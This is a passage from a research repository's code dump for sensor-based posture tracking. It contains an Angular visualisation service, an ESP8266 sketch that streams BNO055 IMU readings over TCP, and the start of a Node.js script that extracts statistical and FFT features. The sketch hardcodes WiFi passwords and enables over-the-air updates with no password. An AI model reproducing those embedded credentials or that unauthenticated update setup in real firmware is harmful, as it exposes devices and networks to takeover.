clustersOnOff : {}\n };\n\n public clusterData = {};\n public colorPalette = [[165, 0, 38] , [215, 48, 39]\n , [244, 109, 67], [253, 174, 97], [254, 224, 139], [217, 239, 139]\n , [166 , 217, 106], [102, 189, 99], [26, 152, 80], [0, 104, 55]];\n\n newDateSelected = new Subject<any>();\n newHistUpdate = new Subject<any>();\n newMapUpdate = new Subject<any>();\n windowPlayInterval;\n winPlayRatio = 0.2;\n\n constructor() { }\n\n // public getPlayingTimeSubscribable(): Observable<Date> {\n // return this.status.playingTime.asObservable();\n // }\n public getNewDateSelectedSubscribable(): Observable<any> {\n return this.newDateSelected.asObservable();\n }\n public getNewHistUpdateSubscribable(): Observable<any> {\n return this.newHistUpdate.asObservable();\n }\n public getNewMapUpdate(): Observable<any> {\n return this.newMapUpdate.asObservable();\n }\n public updateStartTime(date) {\n this.status.selectedDate = date;\n this.status.timeMin = new Date(this.status.availableDates[date].min);\n this.status.timeMax = new Date(this.status.availableDates[date].max);\n this.status.animationStartTime = new Date(this.status.availableDates[date].min);\n this.status.animationEndTime = new Date(this.status.availableDates[date].min);\n this.status.animationEndTime.setSeconds(this.status.animationEndTime.getSeconds() + 60);\n this.status.histStartTime = new Date(this.status.timeMin.valueOf());\n this.status.histEndTime = new Date(this.status.timeMax.valueOf());\n console.log(this.status.availableDates[date]);\n console.log('call next!');\n this.newDateSelected.next(this.status.availableDates[date]);\n // setTimeout((() => {\n // }).apply(this), 10);\n }\n\n public updateRange() {\n this.newDateSelected.next(this.status.availableDates[this.status.selectedDate]);\n }\n public windowPlay() {\n //30000: 150\n //1800000: 1600\n let interval = (150 + (1600 - 150) / (1800000 - 30000) * this.status.windowWidth) * 
this.status.windowPlaySlowDownFactor;\n this.windowPlayInterval = setInterval((() => {\n if (this.status.start_selected_end[2] + this.status.windowWidth > this.status.start_selected_end[3]) {\n clearInterval(this.windowPlayInterval);\n this.status.winPlaying = false;\n }\n this.status.start_selected_end = [\n this.status.start_selected_end[0],\n this.status.start_selected_end[1] + this.status.windowWidth * this.winPlayRatio,\n this.status.start_selected_end[2] + this.status.windowWidth * this.winPlayRatio,\n this.status.start_selected_end[3]\n ];\n }).bind(this), interval);\n }\n\n public stopPlay() {\n if (this.windowPlayInterval) {\n clearInterval(this.windowPlayInterval);\n }\n this.windowPlayInterval = undefined;\n }\n\n public updateDisplayClusterData() {\n if (!this.status.selectedCluster) {\n return;\n }\n const allData = this.deepcopy(this.clusterData[this.status.availableClusters[this.status.selectedCluster]]);\n Object.keys(allData).forEach(cluster => {\n if (!this.status.clustersOnOff[cluster]) {\n return\n }\n var allData_cluster = {interest: [], notInterest: []};\n allData[cluster].forEach(d => {\n if ((d.timestamp >= this.status.selectedTimeStart.valueOf() )\n && (d.timestamp < this.status.selectedTimeEnd.valueOf() + 30000)) {\n if ((d.timestamp >= this.status.histStartTime.valueOf() )\n && (d.timestamp < this.status.histEndTime.valueOf() + 30000)) {\n allData_cluster.interest.push(d);\n } else {\n allData_cluster.notInterest.push(d);\n }\n }\n });\n allData[cluster] = allData_cluster;\n });\n this.status.curDisplayClusterData = allData;\n this.newMapUpdate.next(this.status.curDisplayClusterData);\n // console.log(this.status.curDisplayClusterData);\n // console.log(allData);\n\n // this.status.curDisplayClusterData = this.deepcopy(this.clusterData[this.status.availableClusters[this.status.selectedCluster]])\n // this.newMapUpdate.next(this.status.curDisplayClusterData);\n }\n\n deepcopy(obj) {\n return JSON.parse(JSON.stringify(obj));\n }\n\n}\n"
},
{
"alpha_fraction": 0.5678053498268127,
"alphanum_fraction": 0.5995878577232361,
"avg_line_length": 29.997543334960938,
"blob_id": "178e5795d029176bc3d53e825c846ed8d6903079",
"content_id": "8276c3fc3d86a040bdc3dedd70d92acdf83f45f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 12619,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 407,
"path": "/oriTrakHAR-master/sensorDataCollection/espBno055/espBno055.ino",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "#include <ESP8266WiFi.h>\n#include <ESP8266mDNS.h>\n#include <ArduinoOTA.h>\n\n#include <Adafruit_BNO055_modified.h>\n#include <Adafruit_Sensor.h>\n#include <utility/imumaths.h>\n\n#include \"TimerObject.h\"\n\n#define ESP8266\n#define SDA (0)\n#define SDA_AUX (2)\n#define SCL (4)\n#define SCL_AUX (5)\n#define BAUD_RATE (115200)\n#define BNO055_CAL_DELAY_MS (10)\n#define INTERVAL_100HZ (10)\n#define INTERVAL_20HZ (50)\n#define BOARD_LED (2)\n#define CAL_BLINK_COUNT (3)\n#define PORT (9000)\n#define PAYLOAD_BUFFER_SIZE (20000)\n#define RECEIVE_BUFFER_SIZE (8)\n#define TCP_CONNECT_FREEZE_MAX (250000) // ns\n#define TCP_CONNECT_FREEZE_MIN (100000) // ns\n#define LOST_SERVER_TIME (850000) // ns\n\nextern \"C\" {\n #include \"user_interface.h\"\n}\n\n// #define SAMPLE_DELAY_US (500)\n// const uint8_t* ssid = \"yjinms\";\n// const uint8_t* password = \"1fdd2EE3b448@f432@2f\";\n// const uint8_t* host = \"192.168.0.6\";\n\n/*\n * It seems client.write() is not always synchronous especially when\n * send buffer size is small (I could be wrong. The behavior of the\n * chip is wierd). Stuff in payloadBuf is copied to sendBuff and then\n * send to the server.\n*/\n\nuint8_t payloadBuf[PAYLOAD_BUFFER_SIZE];\n\nconst char* ssid = \"raspiDatalogger\";\nconst char* password = \"d]WJ/6Z\\\\jBu#]g0*Q]XT\";\nconst char* host = \"192.168.2.1\";\n\nconst uint32_t FLAG100 = 1 << 31;\n\nuint32_t led_val = 0;\nuint32_t working_counter = 0;\nuint32_t cal_counter = 0;\n\nTimerObject* timer_100Hz;\nTimerObject* timer_20Hz;\n\nuint64_t tcpLastConnectTimestamp = 0;\nuint64_t tcpReconnectWaitTime = 0;\nuint64_t deadTime = 0;\nuint32_t sanityCounter = 0;\n// volatile uint8_t magBuf[MAG_BUFFER_SIZE];\n\n/* Final payload format\n * NOTE: the chip doesn't like not-32bits-aligned wirte\n * field name data type\n * ------------------- ----------\n * sensor ID uint64_t\n * server timestamp uint64_t\n * receieve timestamp uint64_t\n * send timestamp uint64_t\n * base timestamp uint64_t\n * -------------------------------------------------------------\n * ------------Either---------------------Or-------------- /|\\\n * |Δtimestamp | FlAG100 uint32_t| Δtimestamp uint32_t| |\n * |quat_w float | magn_x float | |\n * |quat_x float | magn_y float | |\n * |quat_y float | magn_z float | |\n * |quat_z float | | repeat n\n * |gyro_x float | | |\n * |gyro_y float | | |\n * |gyro_z float | | |\n * |acc_x float | | |\n * |acc_y float | | |\n * |acc_z float | | |\n * ------------------------------------------------------- \\|/\n * -------------------------------------------------------------\n * 0xFFFFFFFF uint32_t\n * 0xFFFFFFFF uint32_t\n*/\n\nuint64_t* id_p = (uint64_t*) &payloadBuf[0];\nuint64_t* serverTimeStamp_p = (uint64_t*) &payloadBuf[8];\nuint64_t* clientReceiveTimeStamp_p = (uint64_t*) &payloadBuf[16];\nuint64_t* clientSendTimeStamp_p = (uint64_t*) &payloadBuf[24];\nuint64_t* clientBaseTimeStamp_p = (uint64_t*) &payloadBuf[32];\n\nfloat* payloadCursor_p = (float*) &payloadBuf[40];\nfloat* payloadCursor_origin = payloadCursor_p;\n\n// float* magCursor_p = (float*) magBuf;\n// float* magCursor_origin = magCursor_p;\n\nimu::Quaternion quat;\nimu::Vector<3> gyro, lacc, acc, magn;\n\n\nbool ota_flag = true;\nbool mySetup_finished = false;\nbool dead = false;\n\n\n\nAdafruit_BNO055 bno;\nWiFiClient client;\n\nvoid setup() {\n pinMode(BOARD_LED, OUTPUT);\n digitalWrite(BOARD_LED, 0);\n Serial.begin(BAUD_RATE);\n Serial.println(F(\"Booting\"));\n startWIFI();\n client = WiFiClient();\n Serial.println(F(\"Ready\"));\n 
Serial.print(F(\"IP address: \"));\n Serial.println(WiFi.localIP());\n\n // Attach chip id to each message\n uint32_t id = ESP.getChipId();\n id_p[0] = id;\n // client.setNoDelay(true);\n digitalWrite(BOARD_LED, 1);\n randomSeed(id);\n}\n\nvoid startWIFI() {\n WiFi.mode(WIFI_STA);\n WiFi.begin(ssid, password);\n while (WiFi.waitForConnectResult() != WL_CONNECTED) {\n //maybe replave the while loop\n Serial.println(F(\"Connection Failed! Rebooting...\"));\n delay(500);\n ESP.restart();\n }\n\n // Port defaults to 8266\n // ArduinoOTA.setPort(8266);\n\n // Hostname defaults to esp8266-[ChipID]\n // ArduinoOTA.setHostname(\"myesp8266\");\n\n // No authentication by default\n // ArduinoOTA.setPassword((const uint8_t *)\"343\");\n\n ArduinoOTA.onStart([]() {\n Serial.println(F(\"Start\"));\n });\n ArduinoOTA.onEnd([]() {\n Serial.println(F(\"\\nEnd\"));\n });\n ArduinoOTA.onProgress([](unsigned int progress, unsigned int total) {\n Serial.printf(\"Progress: %u%%\\r\", (progress / (total / 100)));\n });\n ArduinoOTA.onError([](ota_error_t error) {\n Serial.printf(\"Error[%u]: \", error);\n if (error == OTA_AUTH_ERROR) Serial.println(F(\"Auth Failed\"));\n else if (error == OTA_BEGIN_ERROR) Serial.println(F(\"Begin Failed\"));\n else if (error == OTA_CONNECT_ERROR) Serial.println(F(\"Connect Failed\"));\n else if (error == OTA_RECEIVE_ERROR) Serial.println(F(\"Receive Failed\"));\n else if (error == OTA_END_ERROR) Serial.println(F(\"End Failed\"));\n });\n ArduinoOTA.begin();\n}\n\n\nvoid readSensor100Hz() {\n if (((payloadCursor_p - payloadCursor_origin) * 4) > PAYLOAD_BUFFER_SIZE - 44) {\n clearBuffer();\n }\n ((uint32_t*)payloadCursor_p)[0] = ((uint32_t) (micros() - *clientBaseTimeStamp_p)) | FLAG100;\n\n quat = bno.getQuat();\n gyro = bno.getVector(Adafruit_BNO055::VECTOR_GYROSCOPE);\n acc = bno.getVector(Adafruit_BNO055::VECTOR_ACCELEROMETER);\n\n payloadCursor_p[1] = quat.w();\n // payloadCursor_p[2] = quat.x();\n // payloadCursor_p[3] = quat.y();\n // payloadCursor_p[4] = quat.z();\n payloadCursor_p[2] = quat.y(); //x\n payloadCursor_p[3] = quat.z(); //y\n payloadCursor_p[4] = quat.x(); //z\n // if ((payloadCursor_p[1] == payloadCursor_p[2]) && (payloadCursor_p[2] == payloadCursor_p[3]) && (payloadCursor_p[3] == payloadCursor_p[4])) {\n // ESP.restart();\n // }\n payloadCursor_p[5] = gyro.x();\n payloadCursor_p[6] = gyro.y();\n payloadCursor_p[7] = gyro.z();\n payloadCursor_p[8] = acc.x();\n payloadCursor_p[9] = acc.y();\n payloadCursor_p[10] = acc.z();\n\n payloadCursor_p = &payloadCursor_p[11];\n\n\n if ((payloadCursor_p[1] == payloadCursor_p[2]) && (payloadCursor_p[1] == payloadCursor_p[3]) && (payloadCursor_p[1] == payloadCursor_p[4])) {\n sanityCounter++;\n } else {\n sanityCounter = 0;\n }\n\n if (sanityCounter == 300) {\n Serial.println(F(\"Chip went crazy, all values are 0\\nRestart!\"));\n ESP.restart();\n }\n}\n\nvoid readSensor20Hz() {\n if (((payloadCursor_p - payloadCursor_origin) * 4) > PAYLOAD_BUFFER_SIZE - 16) {\n clearBuffer();\n }\n ((uint32_t*)payloadCursor_p)[0] = (uint32_t) (micros() - *clientBaseTimeStamp_p);\n\n magn = bno.getVector(Adafruit_BNO055::VECTOR_MAGNETOMETER);\n payloadCursor_p[1] = magn.x();\n payloadCursor_p[2] = magn.y();\n payloadCursor_p[3] = magn.z();\n\n payloadCursor_p = &payloadCursor_p[4];\n}\n\nvoid mySetup() {\n bno = Adafruit_BNO055(55, 0x28);\n if(!bno.begin(SDA, SCL)) {\n Serial.println(F(\"bno not detected on default port\"));\n if (!bno.begin(SDA_AUX, SCL_AUX)) {\n Serial.println(F(\"bno not detected on aux port\"));\n while(1);\n }\n } 
else {\n Serial.println(F(\"bno detected!\"));\n }\n displaySensorDetails(bno);\n displaySensorDetails(bno);\n displayCalStatus(bno);\n bno.setExtCrystalUse(true);\n timer_100Hz= new TimerObject(INTERVAL_100HZ);\n timer_100Hz -> setOnTimer(&readSensor100Hz);\n timer_20Hz= new TimerObject(INTERVAL_20HZ);\n timer_20Hz -> setOnTimer(&readSensor20Hz);\n if (!client.connect(host, PORT)) {\n Serial.println(F(\"Connection to dataServer failed!\"));\n }\n delay(TCP_CONNECT_FREEZE_MAX / 1000);\n timer_100Hz -> Start();\n timer_20Hz -> Start();\n *clientBaseTimeStamp_p = (uint64_t) micros();\n *clientReceiveTimeStamp_p = *clientBaseTimeStamp_p;\n}\n\nvoid loop() {\n ArduinoOTA.handle();\n if (! mySetup_finished) {\n mySetup();\n mySetup_finished = true;\n } else {\n timer_100Hz -> Update();\n timer_20Hz -> Update();\n\n if (micros() - tcpLastConnectTimestamp < tcpReconnectWaitTime) {\n return;\n }\n if (dead) {\n if (micros() - deadTime < TCP_CONNECT_FREEZE_MAX) {\n startWIFI();\n *clientReceiveTimeStamp_p = (uint64_t) micros();\n dead = false;\n } else {\n return;\n }\n }\n\n if (client.connected()) {\n uint32_t receiveLen = client.available();\n if (receiveLen) {\n *clientReceiveTimeStamp_p = (uint64_t) micros();\n\n led_val ^= 1;\n digitalWrite(BOARD_LED, led_val);\n while (client.read((uint8_t *) serverTimeStamp_p, RECEIVE_BUFFER_SIZE) > 0);\n\n *((uint32_t*)&payloadCursor_p[0])= 0xFFFFFFFF;\n *((uint32_t*)&payloadCursor_p[1])= 0xFFFFFFFF;\n uint32_t payloadBufLen = payloadCursor_p - payloadCursor_origin;\n uint64_t sendTimeStamp = (uint64_t) micros();\n *clientSendTimeStamp_p = sendTimeStamp;\n\n client.write((uint8_t*)payloadBuf, payloadBufLen * 4 + 48);\n\n client.flush();\n *clientBaseTimeStamp_p = (uint64_t) micros();\n payloadCursor_p = payloadCursor_origin;\n tcpReconnectWaitTime = 0;\n dead = false;\n deadTime = 0;\n }\n } else {\n Serial.print((int) system_get_free_heap_size());\n Serial.println(F(\"Reconnect TCP!\"));\n client = WiFiClient();\n if (!client.connect(host, PORT)) {\n dead = true;\n Serial.println(F(\"Connection to dataServer failed!\"));\n } else {\n tcpLastConnectTimestamp = (uint64_t) micros();\n *clientReceiveTimeStamp_p = tcpLastConnectTimestamp;\n tcpReconnectWaitTime = random(TCP_CONNECT_FREEZE_MIN, TCP_CONNECT_FREEZE_MAX);\n }\n }\n\n if ((micros() - *clientReceiveTimeStamp_p) > LOST_SERVER_TIME) {\n Serial.print((int) system_get_free_heap_size());\n Serial.println(F(\"Reconnect TCP!\"));\n client.stop();\n *clientReceiveTimeStamp_p = (uint64_t) micros();\n client = WiFiClient();\n if (!client.connect(host, PORT)) {\n dead = true;\n Serial.println(F(\"Connection to dataServer failed!\"));\n } else {\n tcpLastConnectTimestamp = (uint64_t) micros();\n *clientReceiveTimeStamp_p = tcpLastConnectTimestamp;\n tcpReconnectWaitTime = random(TCP_CONNECT_FREEZE_MIN, TCP_CONNECT_FREEZE_MAX);\n }\n }\n\n if (dead) {\n client.stop();\n WiFi.disconnect();\n WiFi.mode(WIFI_OFF);\n Serial.println(F(\"Reconnect WIFI!\"));\n deadTime = (uint64_t) micros();\n }\n }\n}\n\nvoid clearBuffer() {\n Serial.println(F(\"clear Buffer called\"));\n memset(payloadCursor_origin, 0, PAYLOAD_BUFFER_SIZE - 40);\n payloadCursor_p = payloadCursor_origin;\n *clientBaseTimeStamp_p = (uint64_t) micros();\n}\n\n\nvoid displaySensorDetails(Adafruit_BNO055 bno) {\n sensor_t sensor;\n bno.getSensor(&sensor);\n Serial.print(F(\"Sensor: \"));\n Serial.print(sensor.name);\n Serial.print(F(\"vDriver: \"));\n Serial.print(sensor.version);\n Serial.print(F(\"UID: \"));\n Serial.print(sensor.sensor_id);\n 
delay(100);\n}\n\nvoid displaySensorStatus(Adafruit_BNO055 bno) {\n uint8_t system_status, self_test_results, system_error;\n system_status = self_test_results = system_error = 0;\n bno.getSystemStatus(&system_status, &self_test_results, &system_error);\n Serial.print(F(\"SysStat: \"));\n Serial.print(system_status);\n Serial.print(F(\"SelfTest: \"));\n Serial.print(self_test_results);\n Serial.print(F(\"SysErr: \"));\n Serial.println(system_error);\n delay(100);\n}\n\nvoid displayCalStatus(Adafruit_BNO055 bno) {\n uint8_t bno_system, bno_gyro, bno_accel, bno_mag;\n bno.getCalibration(&bno_system, &bno_gyro, &bno_accel, &bno_mag);\n while(bno_system != 3) {\n ArduinoOTA.handle();\n cal_counter++;\n if (cal_counter == CAL_BLINK_COUNT) {\n cal_counter = 0;\n led_val ^= 1;\n digitalWrite(BOARD_LED, led_val);\n // Serial.println(\"blink\");\n }\n bno.getCalibration(&bno_system, &bno_gyro, &bno_accel, &bno_mag);\n Serial.print(F(\"System: \"));\n Serial.print(bno_system);\n Serial.print(F(\"gyro: \"));\n Serial.print(bno_gyro);\n Serial.print(F(\"accel: \"));\n Serial.print(bno_accel);\n Serial.print(F(\"mag: \"));\n Serial.println(bno_mag);\n delay(BNO055_CAL_DELAY_MS);\n }\n led_val = 0;\n digitalWrite(BOARD_LED, led_val);\n}\n\n"
},
{
"alpha_fraction": 0.606242835521698,
"alphanum_fraction": 0.6183210015296936,
"avg_line_length": 41,
"blob_id": "5cdb22007d8f02f95664e880d33edb51e11960c0",
"content_id": "e9c4e5c442c40a8887c76b3be467fa35b1e735e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 20119,
"license_type": "no_license",
"max_line_length": 237,
"num_lines": 479,
"path": "/oriTrakHAR-master/dataProcessing/extractFeature.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "const Promise = require('bluebird')\nconst db = require('sqlite')\nconst config = require('./config')\nconst fs = require('fs')\nconst csv = require('csv-stream')\nconst cluster = require('cluster')\nconst Jstat = require('jStat')\nconst Ra4Fft = require('fft.js')\nconst fftUtil = require('fft-js').util\nconst numCPUs = require('os').cpus().length\n// const numCPUs = 2\n\n// var preprocessedDataDb\n\nif (cluster.isMaster) {\n masterProcess()\n} else {\n childProcess()\n}\n\nfunction childProcess() {\n var preprocessedDataDb\n function handleMasterMsg(msg) {\n console.log(`Worker receive master msg: ${JSON.stringify(msg)}`)\n switch (msg.event) {\n case 'job':\n processData(msg.jobNum)\n break\n case 'fin':\n process.exit()\n break\n }\n }\n var execQueue = dbConnect()\n .then(db => {\n preprocessedDataDb = db\n process.on('message', handleMasterMsg)\n\n })\n .then(() => {\n console.log(`process ${process.pid} connected!`)\n process.send({event:'ready', id:process.pid})\n })\n\n function generateHist(yaw1, yaw2, pitch1, pitch2, roll1, roll2) {\n return Array((yaw2 - yaw1) / config.HIST_BIN_SIZE * (pitch2 - pitch1) / config.HIST_BIN_SIZE * (roll2 - roll1) / config.HIST_BIN_SIZE).fill(0)\n }\n\n function clamp(num, min, max) {\n if (num < min) {\n num = min\n } else if (num > max) {\n num = max\n }\n return num\n }\n\n function processHistGen(yaw1, yaw2, pitch1, pitch2, roll1, roll2) {\n var histArray = generateHist(yaw1, yaw2, pitch1, pitch2, roll1, roll2)\n return function processHist(histDataRows) {\n histDataRows.forEach(row => {\n // console.log(`${JSON.stringify(row)} ${(row.yaw_floor - yaw1) / config.HIST_BIN_SIZE} ${(row.pitch_floor - pitch1) / config.HIST_BIN_SIZE} ${(row.roll_floor - roll1) / config.HIST_BIN_SIZE}`)\n if (row.yaw_floor === null) {\n return\n }\n var yaw = clamp((row.yaw_floor - yaw1) / config.HIST_BIN_SIZE, 0, (yaw2 - yaw1) / config.HIST_BIN_SIZE)\n var pitch = clamp((row.pitch_floor - pitch1) / config.HIST_BIN_SIZE, 0, (pitch2 - pitch1) / config.HIST_BIN_SIZE)\n var roll = clamp((row.roll_floor - roll1) / config.HIST_BIN_SIZE, 0, (roll2 - roll1) / config.HIST_BIN_SIZE)\n histArray[yaw * pitch * roll + pitch * roll + roll] = row.count\n })\n var totalCount = Jstat.sum(histArray)\n if (totalCount > (config.FEATURE_LENGTH / 10000 * 0.85)) {\n // console.log(` sum: ${totalCount}`)\n return histArray.map(d => d/totalCount)\n } else {\n return null\n }\n }\n }\n function processData(jobNum) {\n console.log(`${process.pid} on job ${jobNum}`)\n function getFFTPhasors (input) {\n const f = new Ra4Fft(config.WINDOW_SIZE)\n const out = f.createComplexArray()\n f.realTransform(out, input)\n f.completeSpectrum(out)\n var phasors = []\n out.forEach((element, ndx) => {\n var i = Math.floor(ndx / 2)\n var isOdd = ndx % 2\n if (!isOdd) {\n phasors.push([element])\n } else {\n phasors[i].push(element)\n }\n })\n return phasors\n }\n\n function getKeyFreqMag (phasors, SAMPLE_RATE, id) {\n // var sensor1Frequencies = fftUtil.fftFreq(phasors, config.SAMPLE_RATE)\n // console.log(sensor1Frequencies.length)\n var magnitudes = fftUtil.fftMag(phasors)\n var combined = []\n // console.log(magnitudes)\n for (var i = 0; i < magnitudes.length / 2; i += 8) {\n // console.log(Jstat.sum(magnitudes.slice(i, i+8)))\n combined.push(Jstat.sum(magnitudes.slice(i, i+8)))\n }\n // console.log(`combined: ${JSON.stringify(combined)}`)\n return combined\n }\n\n\n var rawDataProcess = preprocessedDataDb.all(getRawDataQuery(jobNum))\n .then(data => {\n if (data.length <= (config.FEATURE_LENGTH / 
10000 * 0.85)) {\n return null\n }\n torso_gyro_x = data.map(d => d.torso_gyro_x).filter(d => d !== null)\n torso_gyro_y = data.map(d => d.torso_gyro_y).filter(d => d !== null)\n torso_gyro_z = data.map(d => d.torso_gyro_z).filter(d => d !== null)\n torso_acc_x = data.map(d => d.torso_acc_x).filter(d => d !== null)\n torso_acc_y = data.map(d => d.torso_acc_y).filter(d => d !== null)\n torso_acc_z = data.map(d => d.torso_acc_z).filter(d => d !== null)\n torso_acc_mag = data.map(d => d.torso_acc_mag).filter(d => d !== null)\n torso_gyro_mag = data.map(d => d.torso_gyro_mag).filter(d => d !== null)\n head_gyro_x = data.map(d => d.head_gyro_x).filter(d => d !== null)\n head_gyro_y = data.map(d => d.head_gyro_y).filter(d => d !== null)\n head_gyro_z = data.map(d => d.head_gyro_z).filter(d => d !== null)\n head_acc_x = data.map(d => d.head_acc_x).filter(d => d !== null)\n head_acc_y = data.map(d => d.head_acc_y).filter(d => d !== null)\n head_acc_z = data.map(d => d.head_acc_z).filter(d => d !== null)\n head_acc_mag = data.map(d => d.head_acc_mag).filter(d => d !== null)\n head_gyro_mag = data.map(d => d.head_gyro_mag).filter(d => d !== null)\n left_gyro_x = data.map(d => d.left_gyro_x).filter(d => d !== null)\n left_gyro_y = data.map(d => d.left_gyro_y).filter(d => d !== null)\n left_gyro_z = data.map(d => d.left_gyro_z).filter(d => d !== null)\n left_acc_x = data.map(d => d.left_acc_x).filter(d => d !== null)\n left_acc_y = data.map(d => d.left_acc_y).filter(d => d !== null)\n left_acc_z = data.map(d => d.left_acc_z).filter(d => d !== null)\n left_acc_mag = data.map(d => d.left_acc_mag).filter(d => d !== null)\n left_gyro_mag = data.map(d => d.left_gyro_mag).filter(d => d !== null)\n right_gyro_x = data.map(d => d.right_gyro_x).filter(d => d !== null)\n right_gyro_y = data.map(d => d.right_gyro_y).filter(d => d !== null)\n right_gyro_z = data.map(d => d.right_gyro_z).filter(d => d !== null)\n right_acc_x = data.map(d => d.right_acc_x).filter(d => d !== null)\n right_acc_y = data.map(d => d.right_acc_y).filter(d => d !== null)\n right_acc_z = data.map(d => d.right_acc_z).filter(d => d !== null)\n right_acc_mag = data.map(d => d.right_acc_mag).filter(d => d !== null)\n right_gyro_mag = data.map(d => d.right_gyro_mag).filter(d => d !== null)\n\n var mean = [\n Jstat.mean(torso_gyro_x),\n Jstat.mean(torso_gyro_y),\n Jstat.mean(torso_gyro_z),\n Jstat.mean(torso_acc_x),\n Jstat.mean(torso_acc_y),\n Jstat.mean(torso_acc_z),\n Jstat.mean(torso_acc_mag),\n Jstat.mean(torso_gyro_mag),\n Jstat.mean(head_gyro_x),\n Jstat.mean(head_gyro_y),\n Jstat.mean(head_gyro_z),\n Jstat.mean(head_acc_x),\n Jstat.mean(head_acc_y),\n Jstat.mean(head_acc_z),\n Jstat.mean(head_acc_mag),\n Jstat.mean(head_gyro_mag),\n Jstat.mean(left_gyro_x),\n Jstat.mean(left_gyro_y),\n Jstat.mean(left_gyro_z),\n Jstat.mean(left_acc_x),\n Jstat.mean(left_acc_y),\n Jstat.mean(left_acc_z),\n Jstat.mean(left_acc_mag),\n Jstat.mean(left_gyro_mag),\n Jstat.mean(right_gyro_x),\n Jstat.mean(right_gyro_y),\n Jstat.mean(right_gyro_z),\n Jstat.mean(right_acc_x),\n Jstat.mean(right_acc_y),\n Jstat.mean(right_acc_z),\n Jstat.mean(right_acc_mag),\n Jstat.mean(right_gyro_mag)\n ]\n var variance = [\n Jstat.variance(torso_gyro_x),\n Jstat.variance(torso_gyro_y),\n Jstat.variance(torso_gyro_z),\n Jstat.variance(torso_acc_x),\n Jstat.variance(torso_acc_y),\n Jstat.variance(torso_acc_z),\n Jstat.variance(torso_acc_mag),\n Jstat.variance(torso_gyro_mag),\n Jstat.variance(head_gyro_x),\n Jstat.variance(head_gyro_y),\n Jstat.variance(head_gyro_z),\n 
Jstat.variance(head_acc_x),\n Jstat.variance(head_acc_y),\n Jstat.variance(head_acc_z),\n Jstat.variance(head_acc_mag),\n Jstat.variance(head_gyro_mag),\n Jstat.variance(left_gyro_x),\n Jstat.variance(left_gyro_y),\n Jstat.variance(left_gyro_z),\n Jstat.variance(left_acc_x),\n Jstat.variance(left_acc_y),\n Jstat.variance(left_acc_z),\n Jstat.variance(left_acc_mag),\n Jstat.variance(left_gyro_mag),\n Jstat.variance(right_gyro_x),\n Jstat.variance(right_gyro_y),\n Jstat.variance(right_gyro_z),\n Jstat.variance(right_acc_x),\n Jstat.variance(right_acc_y),\n Jstat.variance(right_acc_z),\n Jstat.variance(right_acc_mag),\n Jstat.variance(right_gyro_mag)\n ]\n var median = [\n Jstat.median(torso_gyro_x),\n Jstat.median(torso_gyro_y),\n Jstat.median(torso_gyro_z),\n Jstat.median(torso_acc_x),\n Jstat.median(torso_acc_y),\n Jstat.median(torso_acc_z),\n Jstat.median(torso_acc_mag),\n Jstat.median(torso_gyro_mag),\n Jstat.median(head_gyro_x),\n Jstat.median(head_gyro_y),\n Jstat.median(head_gyro_z),\n Jstat.median(head_acc_x),\n Jstat.median(head_acc_y),\n Jstat.median(head_acc_z),\n Jstat.median(head_acc_mag),\n Jstat.median(head_gyro_mag),\n Jstat.median(left_gyro_x),\n Jstat.median(left_gyro_y),\n Jstat.median(left_gyro_z),\n Jstat.median(left_acc_x),\n Jstat.median(left_acc_y),\n Jstat.median(left_acc_z),\n Jstat.median(left_acc_mag),\n Jstat.median(left_gyro_mag),\n Jstat.median(right_gyro_x),\n Jstat.median(right_gyro_y),\n Jstat.median(right_gyro_z),\n Jstat.median(right_acc_x),\n Jstat.median(right_acc_y),\n Jstat.median(right_acc_z),\n Jstat.median(right_acc_mag),\n Jstat.median(right_gyro_mag)\n ]\n\n\n torso_gyro_x_FFT = getKeyFreqMag(getFFTPhasors(torso_gyro_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_gyro_y_FFT = getKeyFreqMag(getFFTPhasors(torso_gyro_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_gyro_z_FFT = getKeyFreqMag(getFFTPhasors(torso_gyro_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_acc_x_FFT = getKeyFreqMag(getFFTPhasors(torso_acc_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_acc_y_FFT = getKeyFreqMag(getFFTPhasors(torso_acc_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_acc_z_FFT = getKeyFreqMag(getFFTPhasors(torso_acc_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_acc_mag_FFT = getKeyFreqMag(getFFTPhasors(torso_acc_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_gyro_mag_FFT = getKeyFreqMag(getFFTPhasors(torso_gyro_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_gyro_x_FFT = getKeyFreqMag(getFFTPhasors(head_gyro_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_gyro_y_FFT = getKeyFreqMag(getFFTPhasors(head_gyro_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_gyro_z_FFT = getKeyFreqMag(getFFTPhasors(head_gyro_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_acc_x_FFT = getKeyFreqMag(getFFTPhasors(head_acc_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_acc_y_FFT = getKeyFreqMag(getFFTPhasors(head_acc_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_acc_z_FFT = getKeyFreqMag(getFFTPhasors(head_acc_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_acc_mag_FFT = getKeyFreqMag(getFFTPhasors(head_acc_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_gyro_mag_FFT = getKeyFreqMag(getFFTPhasors(head_gyro_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_gyro_x_FFT = getKeyFreqMag(getFFTPhasors(left_gyro_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_gyro_y_FFT = 
